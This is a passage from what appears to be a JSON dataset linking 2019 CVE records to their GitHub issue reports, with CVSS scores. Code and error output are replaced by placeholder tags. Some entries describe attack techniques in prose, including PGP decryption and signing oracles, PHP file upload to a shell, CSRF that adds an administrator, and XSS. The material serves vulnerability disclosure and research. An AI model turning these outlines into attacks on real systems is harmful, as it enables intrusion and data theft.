        "description": "Vulnerable Regular Expression. The following regular expression used in FILETAG is vulnerable to APITAG APITAG This regex is called by multiple methods exposed to the users such as APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010299",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/53566",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/53566",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2018-08-21T16:58:00Z",
        "description": "APITAG has unsound Debig implementation. Found by APITAG The following code causes UB (not observable through crashes, but still): APITAG This will create a APITAG ring with capacity NUMBERTAG then turn that into a slice for Iter , and then print that entire slice. Run it in Miri URLTAG to see for yourself APITAG is in the \"tools\" menu).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010300",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/127",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/127",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-02-25T13:26:26Z",
        "description": "negative size param in server_example_ca.c. Hi team, Their are negative size param in APITAG APITAG NUMBERTAG ersion has this problem. Snip FILETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010304",
        "Issue_Url_old": "https://github.com/mirumee/saleor/issues/3768",
        "Issue_Url_new": "https://github.com/saleor/saleor/issues/3768",
        "Repo_new": "saleor/saleor",
        "Issue_Created_At": "2019-02-25T10:55:24Z",
        "description": "Sensitive data exposed via Graphql. By default Saleor exposes sensitive business information like: APITAG { quantity: Int! APITAG Int! APITAG Money APITAG Int! margin: Int APITAG Int APITAG APITAG } I hope nobody is running Saleor out there with theses fields exposed to public.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010305",
        "Issue_Url_old": "https://github.com/kyz/libmspack/issues/27",
        "Issue_Url_new": "https://github.com/kyz/libmspack/issues/27",
        "Repo_new": "kyz/libmspack",
        "Issue_Created_At": "2019-02-18T08:14:41Z",
        "description": "Heap buffer overflow in APITAG Description: Function APITAG in libmspack has a heap buffer overflow problem( Out of Bound Read ). Affected version: libmspack NUMBERTAG alpha Details: In function APITAG , line NUMBERTAG APITAG will lead to out of bound read while extracting a crafted chm file. CODETAG Details with asan output: ERRORTAG poc file URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-1010315",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/65",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/65",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2019-03-02T23:24:26Z",
        "description": "Divide by zero in APITAG FILETAG Contains fuzzed input Running APITAG with APITAG extracted from the attachment triggers a SIGFPE due to divide by zero in APITAG URLTAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-1010316",
        "Issue_Url_old": "https://github.com/leonnnn/pyxtrlock/issues/21",
        "Issue_Url_new": "https://github.com/leonnnn/pyxtrlock/issues/21",
        "Repo_new": "leonnnn/pyxtrlock",
        "Issue_Created_At": "2019-02-26T12:01:19Z",
        "description": "Padlock displayed but keyboard not blocked. Hi I have installed pyxtrlock in a fedora laptop, and, when executing it, the browser is displayed with the padlock and i cant do anything on it, great... But, if i hit any keyboard shortcut, or if i hit the activity bar with the mouse, i can still use the computer as normal. It looks like it only blocks the interaction of the keyboard with the browser Am i doing something wrong? Is there any config i need to apply? Thanks",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-1010317",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/66",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/66",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2019-03-04T19:43:30Z",
        "description": "Uninitialized Read in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit caff.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-1010319",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/68",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/68",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2019-03-05T18:54:19Z",
        "description": "Uninitialized Read (and Divide by Zero) in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit divzero waveheader.wav leads to a read of an uninitialized location in memory. The uninitialized read sometimes further leads to a divide by zero error. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG . This sometimes leads to a subsequent divide by zero on this line URLTAG I guess the division instruction may or may not be executed based on what value is read for APITAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-10181",
        "Issue_Url_old": "https://github.com/AdoptOpenJDK/IcedTea-Web/issues/327",
        "Issue_Url_new": "https://github.com/adoptopenjdk/icedtea-web/issues/327",
        "Repo_new": "adoptopenjdk/icedtea-web",
        "Issue_Created_At": "2019-07-22T11:46:06Z",
        "description": "upcoming security release NUMBERTAG Three security issues were found in ITW, and have been discussed and are going to be fixed. Those are CVETAG CVETAG CVETAG Unembargo date was set to NUMBERTAG That day I will make PR for itw NUMBERTAG and head.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-10217",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/56269",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/56269",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2019-05-09T14:08:26Z",
        "description": "gcp_storage_object fails with service_account_contents option. SUMMARY When I use APITAG option, the module call fails. When adding a debug task with APITAG the json content is properly displayed. ISSUE TYPE Bug Report COMPONENT NAME gcp_storage_object.py ANSIBLE VERSION CODETAG CONFIGURATION CODETAG OS / ENVIRONMENT N/A STEPS TO REPRODUCE yaml name: Trigger gitlab upload of gitlab secrets file gcp_storage_object: action: upload bucket: \"{{ gitlab_backup_gcs_name }}\" src: PATHTAG dest: \"{{ APITAG }}_gitlab APITAG auth_kind: \"serviceaccount\" service_account_contents: \"{{ lookup('file', gitlab_sa_key_path) }}\" EXPECTED RESULTS File uploaded ACTUAL RESULTS ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10249",
        "Issue_Url_old": "https://github.com/eclipse/xtext-xtend/issues/759",
        "Issue_Url_new": "https://github.com/eclipse/xtext-xtend/issues/759",
        "Repo_new": "eclipse/xtext-xtend",
        "Issue_Created_At": "2019-03-26T15:43:58Z",
        "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Comcast continues to inject its own code into websites you visit URLTAG (over HTTP) Source Locations URLTAG Original Report CVETAG This was originally responsibly disclosed privately, but I was asked to make it public by MENTIONTAG Public Disclosure Option NUMBERTAG File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG Option NUMBERTAG Manually validate the release artifacts If this project's build is fully reproducible URLTAG . An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. Again, this assumes that the build if fully reproducible and will require significantly more work.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-10262",
        "Issue_Url_old": "https://github.com/8test/pentest/issues/2",
        "Issue_Url_new": "https://github.com/8test/pentest/issues/2",
        "Repo_new": "8test/pentest",
        "Issue_Created_At": "2019-03-25T15:09:53Z",
        "description": "SQL injection NUMBERTAG for Bluecms. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10276",
        "Issue_Url_old": "https://github.com/cobub/razor/issues/168",
        "Issue_Url_new": "https://github.com/cobub/razor/issues/168",
        "Repo_new": "cobub/razor",
        "Issue_Created_At": "2019-03-29T05:14:23Z",
        "description": "Vulnerability: Cobub Razor file upload. Vulnerability: Cobub Razor file upload Detail: PATHTAG Line NUMBERTAG Determine whether $_FILES is empty APITAG the document root directory+folder+name >upload file. File type is not restricted. ERRORTAG POC: Construct an upload POST\uff1a ERRORTAG Upload success: CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10644",
        "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/3",
        "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/3",
        "Repo_new": "hyyyp/hybbs2",
        "Issue_Created_At": "2019-03-29T14:38:49Z",
        "description": "CSRF vulnerability which can add the administrator account. When the administrator logged in, open the page with poc , it can add the administrator account. Here, my test site's url is FILETAG . poc: html code below: CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10646",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/682",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/682",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2019-03-27T13:44:43Z",
        "description": "Cross Site Scripting | APITAG NUMBERTAG Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. APITAG URL is URLTAG Steps to reproduce NUMBERTAG Browse to URLTAG to add the snippet NUMBERTAG Insert payload (malicious APITAG APITAG OR APITAG in Name text box APITAG NUMBERTAG Payload will be saved and malicious APITAG will be executed wherever affected snippet is loaded APITAG Best Regards, Pramod Rana URLTAG varchashva [at] gmail [dot] com",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10649",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1533",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1533",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-28T15:41:27Z",
        "description": "memory leak in APITAG of coders/svg.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak vulnerability in function APITAG of coders/svg.c. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-10650",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1532",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1532",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-28T15:33:16Z",
        "description": "heap buffer overflow in APITAG of coders/tiff.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/tiff.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa]fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fa fa fa fa fa fa fa fa fd fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10652",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/38",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/38",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2019-03-29T02:49:24Z",
        "description": "There is an arbitrary file upload vulnerability. There are any files uploaded in the background of your website, you can upload PHP files, so that if the administrator password is leaked, the file uploaded through here can be directly getshell, take over the web example: FILETAG FILETAG I think you should limit the type of file you upload",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-10654",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/108",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/108",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2019-03-21T13:20:51Z",
        "description": "invalid memory read in lzo1x_decompress, which is different from CVETAG . On lrzip NUMBERTAG there is an invalid memory read in lzo1x_decompress, which is different from CVETAG . POC is here: FILETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-10686",
        "Issue_Url_old": "https://github.com/ctripcorp/apollo/issues/2103",
        "Issue_Url_new": "https://github.com/apolloconfig/apollo/issues/2103",
        "Repo_new": "apolloconfig/apollo",
        "Issue_Created_At": "2019-04-01T09:55:54Z",
        "description": "PATHTAG \u95ee\u9898\u8bf4\u660e PATHTAG \u6e90\u7801 CODETAG NUMBERTAG poc APITAG APITAG NUMBERTAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10714",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1495",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1495",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-04T14:35:44Z",
        "description": "Out of boundary in function APITAG of APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG The parameter c missing check in function APITAG which may lead to out of boundary vulnerability. Steps to Reproduce URLTAG APITAG In the gdb: ERRORTAG System Configuration APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: dk from Chaitin Tech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10740",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6638",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6638",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2019-02-22T10:49:17Z",
        "description": "Decryption Oracle based on replying to PGP encrypted emails. In the scope of academic research in cooperation with Ruhr Uni Bochum and FH M\u00fcnster, Germany we discovered a security issue in APITAG An attacker who is in possession of PGP encrypted messages can embed them into a multipart message and re send them to the intended receiver. When the message is read and decrypted by the receiver, the attacker's content is shown. If the victim replies, the plaintext is leaked to an attacker's email address. The root cause for these vulnerabilities lies in the way Roundcube (and many other mail clients) handle partially encrypted multipart messages. Leaking plaintext through replies Attacker model : Attacker is in possession of PGP encrypted messages, which she may have obtained as passive man in the middle or by actively hacking into the victim's mail server or gateway Attacker's goal : Leak the plaintext by wrapping the ciphertext part within a benign looking MIME mail sent to and decrypted+replied to by the victim Attack outline: If Roundcube receives a multipart email, as depicted below, it decrypt the ciphertext part(s), together with the attacker controlled text (which may be prepended and/or appended). APITAG A benign looking attacker's text may lure the victim into replying. Because the decrypted part is also quoted in the reply, the user unintentionally acts as a decryption oracle. To obfuscate the existence of the encrypted part(s), the attacker may add a lot of newlines or hide it within a long conversation history. A user replying to such a \u2018mixed content\u2019 conversation thereby leaks the plaintext of encrypted messages wrapped within attacker controlled text. Countermeasures Do not decrypt emails unless the PGP encrypted part is the root node and therefore the only part in the MIME tree.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10741",
        "Issue_Url_old": "https://github.com/k9mail/k-9/issues/3925",
        "Issue_Url_new": "https://github.com/thundernest/k-9/issues/3925",
        "Repo_new": "thundernest/k-9",
        "Issue_Created_At": "2019-02-23T16:49:30Z",
        "description": "Signing Oracle based on keeping CSS styles in replies to HTML emails. Dear K NUMBERTAG Mail team, In the scope of academic research in cooperation with Ruhr Uni Bochum and FH M\u00fcnster, Germany we discovered a security issue in K NUMBERTAG Mail when used in combination with PGP APITAG ): K NUMBERTAG Mail quotes and includes CSS internal APITAG elements in email replies. This allows an attacker to abuse K NUMBERTAG Mail as a signing oracle for arbitrary PGP signed emails. The attack is outlined as follows: Attack scenario Digital signatures should guarantee integrity, authenticity, and non repudiation of messages. To give an example, Johnny could be a commander in chief who takes information security seriously. All his emails are digitally signed, making it hard to impersonate him in order to send forged statements or instructions. The goal of our attacker Eve is to start false flag warfare. Therefore she needs to obtain a digitally signed \"declaration of war\" which she can forward to the armed forces. General idea Eve now sends an email to commander Johnny, in which she hides her malicious content using CSS while a benign text message, such as APITAG up Johnny?\", is added to be shown by K NUMBERTAG Mail. Similarly, the benign text can be hidden while showing the malicious content, based on CSS conditional rules which are satisfied only for a third party. If Johnny replies to such a specially crafted HTML/CSS email, he signs arbitrary covert content along with visible content. This signed message can then be forwarded by Eve to a third party (e.g., the armed forces) where it displays the previously hidden malicious content \"I hereby declare war\". A simple example email is given below: CODETAG In this example, different content is shown based on the device's screen resolution. It can be used to obtain a signed email from a mobile device, where a benign message is shown. The reply message instead displays a (signed) declaration of war when shown on a desktop mail client. Conditional CSS rules The W3C specifies CSS conditional rules (e.g., APITAG ) which allow different formatting based on conditions such as screen width or orientation. For example, a different text can be shown whether a mobile phone is hold in portrait or landscape mode or whether the document is displayed on a screen or printed out. But there are lots of other options: for example, mail clients can be fingerprinted based on the APITAG conditional rule or various proprietary conditional statements of certain clients can be applied. Without going into detail here, in the scope of our research we found conditional CSS to show/hide certain text for virtually every email client that exists. CSS blinding options We identified seven CSS properties which can be used for covert content attacks as shown below. However, this list is unlikely to be complete because CSS is very complex and offers more possibilities to hide text. CODETAG Impact The attack allows Eve to obtain valid signatures for arbitrary content to be displayed. This can be used to trick a third party, which relies on the authenticity and integrity of signed messages, to perform certain actions (such as starting a war). A forensic analysis can reveal the deception, but then it may already be too late (the war is already declared). Countermeasures There are three options to counter the attack, each with a usability security trade off NUMBERTAG Drop CSS support in general : Conditional CSS makes it easy for an attacker to hide certain text within a signed message while showing different text. Ideally, clients would ignore CSS in received emails. However, this is an unrealistic scenario given today's usage of email. Sanitizing conditional CSS rules and properties which can be used to hide content is feasible, but it may be insufficient as web technologies are constantly evolving NUMBERTAG Only ASCII text in replies : It should not harm the user experience if mail clients converted quoted messages into ASCII text when replying to an email. Various clients are already doing this. Thus, we recommend that security focused clients should adopt this behavior NUMBERTAG Remove CSS styles in replies : Email clients should not sign any quoted CSS APITAG (or APITAG ) from the original message, so that they cannot be used as signing oracles, based on blinding text with CSS conditional statements. Greetings, Jens",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10773",
        "Issue_Url_old": "https://github.com/yarnpkg/yarn/issues/7761",
        "Issue_Url_new": "https://github.com/yarnpkg/yarn/issues/7761",
        "Repo_new": "yarnpkg/yarn",
        "Issue_Created_At": "2019-12-12T08:13:35Z",
        "description": "globally installed package overwrites an existing binary in the target install location. APITAG npm has announced vulnerabilities that npm has been fixed. URLTAG One of the vulnerabilities has been fixed at yarn NUMBERTAG Thank you! \ud83d\udc4f\ud83d\udc4f\ud83d\udc4f But yarn hasn't fixed the other yet. Do you have any plans to fix this? Do you want to request a feature or report a bug ? APITAG bug? What is the current behavior? globally installed package overwrites an existing binary in the target install location. If the current behavior is a bug, please provide the steps to reproduce. APITAG create a symlink named create react app into a directory that yarn uses for globally install. APITAG The symlink has been overwritten What is the expected behavior? Do not overwrite the symlink. Please mention your FILETAG , yarn and operating system version. Node: APITAG Yarn NUMBERTAG OS: APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-10842",
        "Issue_Url_old": "https://github.com/twbs/bootstrap-sass/issues/1195",
        "Issue_Url_new": "https://github.com/twbs/bootstrap-sass/issues/1195",
        "Repo_new": "twbs/bootstrap-sass",
        "Issue_Created_At": "2019-03-26T22:59:52Z",
        "description": "NUMBERTAG Hi there, We noticed that NUMBERTAG was yanked, and NUMBERTAG was published to APITAG We thought this might be because of ruby sass being deprecated URLTAG , but we can't seem to see the NUMBERTAG code on APITAG Looking further, there's APITAG looking code in what i installed via APITAG : ERRORTAG I have not run this, and I'm a little concerned with what's going on here. Please advise.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10844",
        "Issue_Url_old": "https://github.com/sony/nnabla/issues/209",
        "Issue_Url_new": "https://github.com/sony/nnabla/issues/209",
        "Repo_new": "sony/nnabla",
        "Issue_Created_At": "2018-07-16T07:19:30Z",
        "description": "Reliance on Untrusted Inputs in a Security Decision. Team, File: PATHTAG CODETAG Environment variables are untrustable input if they can be set by an attacker. They can have any content and length, and the same variable can be set more than once such as ( CVETAG , CVETAG ).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10877",
        "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2071",
        "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2071",
        "Repo_new": "teeworlds/teeworlds",
        "Issue_Created_At": "2019-03-22T16:11:41Z",
        "description": "Integer overflow and null pointer dereference in APITAG in PATHTAG Hello Teeworlds dev team, There is an integer overflow in APITAG which can lead to a buffer overflow. ERRORTAG APITAG and APITAG can be arbitrary integers and there is no check for an integer overflow when multiplying these integers with each other and with APITAG . Also there is no check if mem_alloc returns NULL which can lead to a null pointer dereference. Regards, Mans van Someren FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10878",
        "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2073",
        "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2073",
        "Repo_new": "teeworlds/teeworlds",
